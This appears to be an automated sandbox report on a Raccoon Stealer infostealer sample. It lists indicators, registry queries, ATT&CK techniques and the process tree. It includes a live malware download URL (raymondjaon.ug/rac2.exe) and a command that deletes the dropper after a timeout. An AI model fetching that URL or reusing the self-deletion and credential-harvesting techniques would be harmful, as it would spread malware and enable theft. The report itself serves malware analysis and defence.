raccoon | hxxp://raymondjaon[.]ug/rac2[.]exe

Analysis

max time kernel
54s
max time network
142s
platform
windows10_x64
resource
win10
submitted
02-07-2020 15:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://raymondjaon.ug/rac2.exe
Sample

200702-9hkcamm6ge

Score

10^/10

ransomware spyware discovery stealer raccoon

Malware Config

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note

[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Tue Jun 23 14:23:14 2020 Launched at: 2020.07.02 - 15:54:19 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (696 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks for installed software on the system 1 TTPs 31 IoCs

discovery

Query Registry

T1012

Processes:

rac2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	rac2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName	rac2.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	rac2.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	rac2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	rac2.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	rac2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName	rac2.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

3820 iexplore.exe
3820 iexplore.exe
1892 IEXPLORE.EXE
1892 IEXPLORE.EXE

pid	process
3820	iexplore.exe
3820	iexplore.exe
1892	IEXPLORE.EXE
1892	IEXPLORE.EXE

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	process
2420	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2420	WerFault.exe
2136	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe
2440	WerFault.exe
2440	WerFault.exe
2136	WerFault.exe
2136	WerFault.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops desktop.ini file(s) 1 IoCs

Processes:

rac2.exe

description ioc process

File created C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini rac2.exe
Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Executes dropped EXE 6 IoCs

Processes:

rac2.exerac2.exeqKuqi9bOZI.exetFRMWpxHbs.exeezzPaF6tNp.exerrVwnhqVSx.exe

pid process

2952 rac2.exe
3668 rac2.exe
840 qKuqi9bOZI.exe
60 tFRMWpxHbs.exe
1212 ezzPaF6tNp.exe
1468 rrVwnhqVSx.exe
Loads dropped DLL 8 IoCs

Processes:

rac2.exe

pid process

3668 rac2.exe
3668 rac2.exe
3668 rac2.exe
3668 rac2.exe
3668 rac2.exe
3668 rac2.exe
3668 rac2.exe
3668 rac2.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini	rac2.exe

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

pid	process
2952	rac2.exe
3668	rac2.exe
840	qKuqi9bOZI.exe
60	tFRMWpxHbs.exe
1212	ezzPaF6tNp.exe
1468	rrVwnhqVSx.exe

pid	process
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe
3668	rac2.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30822537"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "25036227"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30822537"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 102120028950d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = b4679a610d44d601	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{00BA147D-3A26-4876-9860-4110DD56AE97}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "25036227"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "31911270"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e0000000002000000000010660000000100002000000003c438b9bd3eee63e732857203e177491c3f8a24b85ee27c1e29ccc7bb873540000000000e8000000002000020000000667e92e4e33187258aa897de6b856182800bbaf903b51b732025c56569f1cf8d2000000049af087ed03f394d13caee4623149bcb705144fa3a9b2ededf08335439fe55f7400000005a620adabbc82f2f326beb11e89107ad3fb2e471e632ed29e320814609950a30fc90db7a7332a3b2f7e0dea82f577889ff5ef771db29847abb54e16e6026176e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 208416028950d601	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30822537"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2CF441EC-BC7C-11EA-95F0-D278D89B3D2A} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000006176abf711f3b7afb8e02b4b224403fc7606cc6b0b103534b27153aed5ec4af9000000000e800000000200002000000084dff968f074a1f6099fd1c05d502c4a105742b663b6600776823565ab5814872000000012feee22ddfe8456371c2ba7f1ae5e8d8c28d14cba893cd0668cf0bde489e4f240000000778ff984801a6d8ef0f81b2a911d5c9e9b20f04837e19052ff809c492d48814835740f39132698850d703d3e3722d438b814ba7b54753ee9f89215b25cb10ccf	iexplore.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2136 60 WerFault.exe tFRMWpxHbs.exe
2420 1212 WerFault.exe ezzPaF6tNp.exe
2440 1468 WerFault.exe rrVwnhqVSx.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1836 timeout.exe

pid	pid_target	process	target process
2136	60	WerFault.exe	tFRMWpxHbs.exe
2420	1212	WerFault.exe	ezzPaF6tNp.exe
2440	1468	WerFault.exe	rrVwnhqVSx.exe

pid	process
1836	timeout.exe

Checks whether UAC is enabled 2 IoCs

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

iexplore.exerac2.exerac2.execmd.exe

description	pid	process	target process
PID 3820 wrote to memory of 1892	3820	iexplore.exe	IEXPLORE.EXE
PID 3820 wrote to memory of 1892	3820	iexplore.exe	IEXPLORE.EXE
PID 3820 wrote to memory of 1892	3820	iexplore.exe	IEXPLORE.EXE
PID 3820 wrote to memory of 2952	3820	iexplore.exe	rac2.exe
PID 3820 wrote to memory of 2952	3820	iexplore.exe	rac2.exe
PID 3820 wrote to memory of 2952	3820	iexplore.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 2952 wrote to memory of 3668	2952	rac2.exe	rac2.exe
PID 3668 wrote to memory of 840	3668	rac2.exe	qKuqi9bOZI.exe
PID 3668 wrote to memory of 840	3668	rac2.exe	qKuqi9bOZI.exe
PID 3668 wrote to memory of 840	3668	rac2.exe	qKuqi9bOZI.exe
PID 3668 wrote to memory of 60	3668	rac2.exe	tFRMWpxHbs.exe
PID 3668 wrote to memory of 60	3668	rac2.exe	tFRMWpxHbs.exe
PID 3668 wrote to memory of 60	3668	rac2.exe	tFRMWpxHbs.exe
PID 3668 wrote to memory of 1212	3668	rac2.exe	ezzPaF6tNp.exe
PID 3668 wrote to memory of 1212	3668	rac2.exe	ezzPaF6tNp.exe
PID 3668 wrote to memory of 1212	3668	rac2.exe	ezzPaF6tNp.exe
PID 3668 wrote to memory of 1468	3668	rac2.exe	rrVwnhqVSx.exe
PID 3668 wrote to memory of 1468	3668	rac2.exe	rrVwnhqVSx.exe
PID 3668 wrote to memory of 1468	3668	rac2.exe	rrVwnhqVSx.exe
PID 3668 wrote to memory of 1500	3668	rac2.exe	cmd.exe
PID 3668 wrote to memory of 1500	3668	rac2.exe	cmd.exe
PID 3668 wrote to memory of 1500	3668	rac2.exe	cmd.exe
PID 1500 wrote to memory of 1836	1500	cmd.exe	timeout.exe
PID 1500 wrote to memory of 1836	1500	cmd.exe	timeout.exe
PID 1500 wrote to memory of 1836	1500	cmd.exe	timeout.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

3820 iexplore.exe
3820 iexplore.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

rac2.exe

description pid process target process

PID 2952 set thread context of 3668 2952 rac2.exe rac2.exe
Raccoon log file 1 IoCs
Detects a log file produced by the Raccoon Stealer.

Processes:

yara_rule

raccoon_log_file

pid	process
3820	iexplore.exe
3820	iexplore.exe

description	pid	process	target process
PID 2952 set thread context of 3668	2952	rac2.exe	rac2.exe

yara_rule
raccoon_log_file

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeRestorePrivilege	2136	WerFault.exe
Token: SeBackupPrivilege	2136	WerFault.exe
Token: SeRestorePrivilege	2420	WerFault.exe
Token: SeBackupPrivilege	2420	WerFault.exe
Token: SeRestorePrivilege	2440	WerFault.exe
Token: SeBackupPrivilege	2440	WerFault.exe
Token: SeBackupPrivilege	2440	WerFault.exe
Token: SeDebugPrivilege	2420	WerFault.exe
Token: SeDebugPrivilege	2136	WerFault.exe
Token: SeDebugPrivilege	2440	WerFault.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://raymondjaon.ug/rac2.exe
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
PID:3820
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3820 CREDAT:82945 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1892
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe
  "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetThreadContext
  PID:2952
- - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe
    "{path}"
    3⤵
    - Checks for installed software on the system
    - Drops desktop.ini file(s)
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\qKuqi9bOZI.exe
      "C:\Users\Admin\AppData\Local\Temp\qKuqi9bOZI.exe"
      4⤵
      Executes dropped EXE
      PID:840
  - - C:\Users\Admin\AppData\Local\Temp\tFRMWpxHbs.exe
      "C:\Users\Admin\AppData\Local\Temp\tFRMWpxHbs.exe"
      4⤵
      Executes dropped EXE
      PID:60
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1060
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
  - - C:\Users\Admin\AppData\Local\Temp\ezzPaF6tNp.exe
      "C:\Users\Admin\AppData\Local\Temp\ezzPaF6tNp.exe"
      4⤵
      Executes dropped EXE
      PID:1212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1060
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\rrVwnhqVSx.exe
      "C:\Users\Admin\AppData\Local\Temp\rrVwnhqVSx.exe"
      4⤵
      Executes dropped EXE
      PID:1468
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 1060
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Drops file in Windows directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1500
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\rac2.exe.l6xs9o0.partial

Download Submit
C:\Users\Admin\AppData\Local\Temp\ezzPaF6tNp.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ezzPaF6tNp.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\qKuqi9bOZI.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\qKuqi9bOZI.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrVwnhqVSx.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrVwnhqVSx.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\tFRMWpxHbs.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\tFRMWpxHbs.exe

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

Download Submit
memory/60-49-0x0000000000000000-mapping.dmp

Download
memory/60-21-0x0000000000000000-mapping.dmp

Download
memory/60-43-0x0000000000000000-mapping.dmp

Download
memory/60-46-0x0000000000000000-mapping.dmp

Download
memory/60-52-0x0000000000000000-mapping.dmp

Download
memory/60-40-0x0000000000000000-mapping.dmp

Download
memory/60-37-0x0000000000000000-mapping.dmp

Download
memory/60-97-0x0000000000000000-mapping.dmp

Download
memory/840-18-0x0000000000000000-mapping.dmp

Download
memory/1212-47-0x0000000000000000-mapping.dmp

Download
memory/1212-39-0x0000000000000000-mapping.dmp

Download
memory/1212-50-0x0000000000000000-mapping.dmp

Download
memory/1212-45-0x0000000000000000-mapping.dmp

Download
memory/1212-24-0x0000000000000000-mapping.dmp

Download
memory/1212-35-0x0000000000000000-mapping.dmp

Download
memory/1212-42-0x0000000000000000-mapping.dmp

Download
memory/1468-48-0x0000000000000000-mapping.dmp

Download
memory/1468-44-0x0000000000000000-mapping.dmp

Download
memory/1468-38-0x0000000000000000-mapping.dmp

Download
memory/1468-27-0x0000000000000000-mapping.dmp

Download
memory/1468-41-0x0000000000000000-mapping.dmp

Download
memory/1468-36-0x0000000000000000-mapping.dmp

Download
memory/1468-51-0x0000000000000000-mapping.dmp

Download
memory/1500-28-0x0000000000000000-mapping.dmp

Download
memory/1836-31-0x0000000000000000-mapping.dmp

Download
memory/1892-0-0x0000000000000000-mapping.dmp

Download
memory/2136-33-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/2136-55-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

Filesize
4KB

Download
memory/2420-34-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
